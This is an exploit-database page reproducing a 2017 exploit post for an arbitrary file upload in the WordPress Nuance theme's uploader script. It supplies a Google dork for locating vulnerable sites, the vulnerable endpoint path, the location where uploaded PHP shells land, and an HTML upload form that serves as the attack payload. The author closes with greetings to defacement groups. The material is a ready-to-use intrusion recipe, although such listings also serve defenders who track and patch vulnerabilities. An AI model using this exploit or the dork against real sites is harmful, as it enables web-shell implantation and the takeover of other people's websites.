Advertisement






Wordpress Themes Nunace Shell Upload Vulnerability | CSRF

CVE Category Price Severity
CWE-352 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2017-03-15
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.84654 0.96123

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017030138

Below is a copy:

Wordpress Themes Nunace Shell Upload Vulnerability | CSRF#################################################################################
# Wordpress Themes Nuance Shell Upload Vulnerability | CSRF
# Author : Berandal
# Google Dork: inurl:/wp-content/themes/nuance/
# Tested on: Win 7, Linux
# Blog : http://www.maxteroit.com/
#################################################################################

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

# [!] Exploit : http://127.0.0.1/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php

# [!] File Location : http://127.0.0.1/wp-content/uploads/[year]/[month]/filename.php

#################################################################################
#[*] CSRF:
#################################################################################
<html>
<body>
form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="Upload" />
</form>
</body>
</html>
#################################################################################
# [*] ABOUT:
#################################################################################
# Facebook: https://www.facebook.com/owlsquad.id
# Twitter: https://www.twitter.com/id_berandal
# Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.
#################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.